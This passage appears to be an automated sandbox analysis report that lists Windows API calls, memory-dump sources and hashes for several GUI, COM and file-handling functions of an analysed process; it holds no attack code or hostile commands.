                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 001D6571
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 001D658A
                                                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 001D65E8
                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 001D65F8
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 001D660A
                                                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 001D665E
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 001D666C
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 001D667E
                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 001D66C0
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 001D66D3
                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001D66E9
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 001D66F6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                    • String ID:
                                                                                                    • API String ID: 3096461208-0
                                                                                                    • Opcode ID: fb262de6ebf814a926a9e210a55985f67f09cce8b5d05839a611ccc35f783f34
                                                                                                    • Instruction ID: a1ee804e06e1dd56f7dabb014116d079817af50d3fd24f06e45e739d8a2e74fd
                                                                                                    • Opcode Fuzzy Hash: fb262de6ebf814a926a9e210a55985f67f09cce8b5d05839a611ccc35f783f34
                                                                                                    • Instruction Fuzzy Hash: 19510E71A01305AFDF08CFA8DD89AAEBBB9FB48300F508129F519E7295D7719D048B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001720D8 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 001721E4: GetWindowLongW.USER32(?,000000EB), ref: 001721F2
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00172102
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ColorLongWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 259745315-0
                                                                                                    • Opcode ID: 8751e0b1058b2df1ee2e8f851d21f30fd8ff5cf90f65cf1290decc61a398ce33
                                                                                                    • Instruction ID: 85ed1aea1c0c028d1be255155e995bd5b6311550ac2979e4a2e018855e4f64f4
                                                                                                    • Opcode Fuzzy Hash: 8751e0b1058b2df1ee2e8f851d21f30fd8ff5cf90f65cf1290decc61a398ce33
                                                                                                    • Instruction Fuzzy Hash: 6141A431101740AFDB345F78AC48BBA7B75BB46320F558655FAAA872E1CB319D43DB10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 002048F7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0020499A
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 002049A1
                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002049B4
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 002049BC
                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 002049C7
                                                                                                    • DeleteDC.GDI32(00000000), ref: 002049D1
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 002049DB
                                                                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 002049F1
                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 002049FD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                    • String ID: static
                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                    • Opcode ID: 0b6de1a5755b91203b3c1b84c17a9bf501d837938adfbef50ecaa21f0984e2cc
                                                                                                    • Instruction ID: 9fdc2a5c18eec5cb8cad5a4b5546cb018fbd3d141510b8c4428316871fb338c5
                                                                                                    • Opcode Fuzzy Hash: 0b6de1a5755b91203b3c1b84c17a9bf501d837938adfbef50ecaa21f0984e2cc
                                                                                                    • Instruction Fuzzy Hash: CB316D7211131AABDF11AFA4EC08FDA3B69FF0D324F104211FA58A60E1C735E820DB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001F458D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 001F45B9
                                                                                                    • CoInitialize.OLE32(00000000), ref: 001F45E7
                                                                                                    • CoUninitialize.OLE32 ref: 001F45F1
                                                                                                    • _wcslen.LIBCMT ref: 001F468A
                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 001F470E
                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 001F4832
                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 001F486B
                                                                                                    • CoGetObject.OLE32(?,00000000,00210B64,?), ref: 001F488A
                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 001F489D
                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001F4921
                                                                                                    • VariantClear.OLEAUT32(?), ref: 001F4935
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 429561992-0
                                                                                                    • Opcode ID: 66ef851d44d95b214817d08d3adc4d8e8acc261ef0d083a51b24db1b94f2f6ce
                                                                                                    • Instruction ID: 13458e019f4d86dabddc7ed8ef0745047cf0983987f052c1f20991b1a7a595db
                                                                                                    • Opcode Fuzzy Hash: 66ef851d44d95b214817d08d3adc4d8e8acc261ef0d083a51b24db1b94f2f6ce
                                                                                                    • Instruction Fuzzy Hash: E7C146716083099FD700EF68C88496BB7E9FF89758F10491DFA899B221DB70ED46CB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001E83F0 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32(00000000), ref: 001E844D
                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001E84E9
                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 001E84FD
                                                                                                    • CoCreateInstance.OLE32(00210CD4,00000000,00000001,00237E8C,?), ref: 001E8549
                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001E85CE
                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 001E8626
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 001E86B1
                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001E86D4
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 001E86DB
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 001E8730
                                                                                                    • CoUninitialize.OLE32 ref: 001E8736
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2762341140-0
                                                                                                    • Opcode ID: 707db0a18d3e053a31d4f8205400562574746c493be776487cb548d54c15f1f8
                                                                                                    • Instruction ID: 78477573f555a249cd698ac39884a61969933857aeb3b78957e37e6a52951251
                                                                                                    • Opcode Fuzzy Hash: 707db0a18d3e053a31d4f8205400562574746c493be776487cb548d54c15f1f8
                                                                                                    • Instruction Fuzzy Hash: 69C10B75A00649EFCB14DFA5C888DAEBBF9FF48314B148498E519EB261CB30ED45CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D0318 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001D033F
                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 001D0398
                                                                                                    • VariantInit.OLEAUT32(?), ref: 001D03AA
                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 001D03CA
                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 001D041D
                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 001D0431
                                                                                                    • VariantClear.OLEAUT32(?), ref: 001D0446
                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 001D0453
                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001D045C
                                                                                                    • VariantClear.OLEAUT32(?), ref: 001D046E
                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001D0479
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2706829360-0
                                                                                                    • Opcode ID: 6535167db319951c8e806ab46740d6f56e8fd3fc3b41e3861848ca5a3963e700
                                                                                                    • Instruction ID: f9d75ddd919f082273f739db32a184337970da1f01276912aaf91f87b2e36e44
                                                                                                    • Opcode Fuzzy Hash: 6535167db319951c8e806ab46740d6f56e8fd3fc3b41e3861848ca5a3963e700
                                                                                                    • Instruction Fuzzy Hash: C9415F75A00219AFCF05DFA4D848EEEBBB9FF58354F008069E955A7362C730A945CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0020A8E5 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 260windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00172441: GetWindowLongW.USER32(00000000,000000EB), ref: 00172452
                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0020A926
                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0020A946
                                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0020AB83
                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0020ABA1
                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0020ABC2
                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 0020ABE1
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0020AC06
                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0020AC29
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1211466189-3916222277
                                                                                                    • Opcode ID: c31994c384cd868bc7646520ef0f14e7911dacdb99849cfd8aedaca9085d37d2
                                                                                                    • Instruction ID: 8dc4460a13fe339720b55c2226a702351acab65ad6283f9ccff85caaf3d7c47c
                                                                                                    • Opcode Fuzzy Hash: c31994c384cd868bc7646520ef0f14e7911dacdb99849cfd8aedaca9085d37d2
                                                                                                    • Instruction Fuzzy Hash: A9B1CA3161031ADFDF14CF68C9887AE7BB2FF44704F598069EC499B296D730A9A0CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001E8AEF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocalTime.KERNEL32(?), ref: 001E8BB1
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 001E8BC1
                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001E8BCD
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001E8C6A
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001E8C7E
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001E8CB0
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001E8CE6
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001E8CEF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                    • String ID: *.*
                                                                                                    • API String ID: 1464919966-438819550
                                                                                                    • Opcode ID: 784392ae5277acd7faec33686926fa6029f71abb5abe9dc9d67ab3184b6eac91
                                                                                                    • Instruction ID: c23b7bfa067d1f3aa0cb0a236cd288769b4e8df1aa2ea80b653b1f441bcaa043
                                                                                                    • Opcode Fuzzy Hash: 784392ae5277acd7faec33686926fa6029f71abb5abe9dc9d67ab3184b6eac91
                                                                                                    • Instruction Fuzzy Hash: 766179B25087459FCB10EF61C8449AFB3E9FF99314F04891EF98987251EB31EA45CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 002045A5 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateMenu.USER32 ref: 002045D8
                                                                                                    • SetMenu.USER32(?,00000000), ref: 002045E7
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0020466F
                                                                                                    • IsMenu.USER32(?), ref: 00204683
                                                                                                    • CreatePopupMenu.USER32 ref: 0020468D
                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002046BA
                                                                                                    • DrawMenuBar.USER32 ref: 002046C2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                    • String ID: 0$F
                                                                                                    • API String ID: 161812096-3044882817
                                                                                                    • Opcode ID: ff6c9c51e85d5ed378b9153680cadfa409a7e291cafa919a84ea1c452ba80995
                                                                                                    • Instruction ID: 595af496fa095e876a03850c8c5c80fd5769e453e09782d6424d735541081109
                                                                                                    • Opcode Fuzzy Hash: ff6c9c51e85d5ed378b9153680cadfa409a7e291cafa919a84ea1c452ba80995
                                                                                                    • Instruction Fuzzy Hash: 33416EB8A1130AEFDB14DFA5E858AAA7BB9FF0A314F144058FA4597391D731A920CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D276F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
                                                                                                      • Part of subcall function 001D4536: GetClassNameW.USER32(?,?,000000FF), ref: 001D4559
                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 001D27F4
                                                                                                    • GetDlgCtrlID.USER32 ref: 001D27FF
                                                                                                    • GetParent.USER32 ref: 001D281B
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 001D281E
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 001D2827
                                                                                                    • GetParent.USER32(?), ref: 001D283B
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 001D283E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 711023334-1403004172
                                                                                                    • Opcode ID: 1c4b08c68b2c3feb73ec256919dc71a9a2bbb00685b56b1255eb08c77cbabbcd
                                                                                                    • Instruction ID: 0e449095565254a3de3027a52e61ba7a95eec93b4d589459388c49376647cc66
                                                                                                    • Opcode Fuzzy Hash: 1c4b08c68b2c3feb73ec256919dc71a9a2bbb00685b56b1255eb08c77cbabbcd
                                                                                                    • Instruction Fuzzy Hash: BF21C274D00218BBCF15AFA0DC89EEEBBB9EF25310F104156F961A72A2CB755805DB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001D2850 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0017B25F: _wcslen.LIBCMT ref: 0017B269
                                                                                                      • Part of subcall function 001D4536: GetClassNameW.USER32(?,?,000000FF), ref: 001D4559
                                                                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 001D28D3
                                                                                                    • GetDlgCtrlID.USER32 ref: 001D28DE
                                                                                                    • GetParent.USER32 ref: 001D28FA
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 001D28FD
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 001D2906
                                                                                                    • GetParent.USER32(?), ref: 001D291A
                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 001D291D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                    • String ID: ComboBox$ListBox
                                                                                                    • API String ID: 711023334-1403004172
                                                                                                    • Opcode ID: fdde0cf8303b4ef0bbbe50f0e03712f7565b1cef5adcee9a87bf4a2e7e1231a6
                                                                                                    • Instruction ID: 2d725fb3dfcea946d81e82da70b3759163e79df5d4cb4b086972092ced7f0641
                                                                                                    • Opcode Fuzzy Hash: fdde0cf8303b4ef0bbbe50f0e03712f7565b1cef5adcee9a87bf4a2e7e1231a6
                                                                                                    • Instruction Fuzzy Hash: 8D21F675D00218BBCF15AFA0EC89EEEBBB8EF25300F104156F951A32A6D7755815DF60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00204382 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002043FC
                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002043FF
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00204426
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00204449
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002044C1
                                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 0020450B
                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00204526
                                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00204541
                                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00204555
                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00204572
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 312131281-0
                                                                                                    • Opcode ID: e30cbf51bcede0e6d1a13ed04e19da147c014d7ce2f0d1731da2e2d4e66515cf
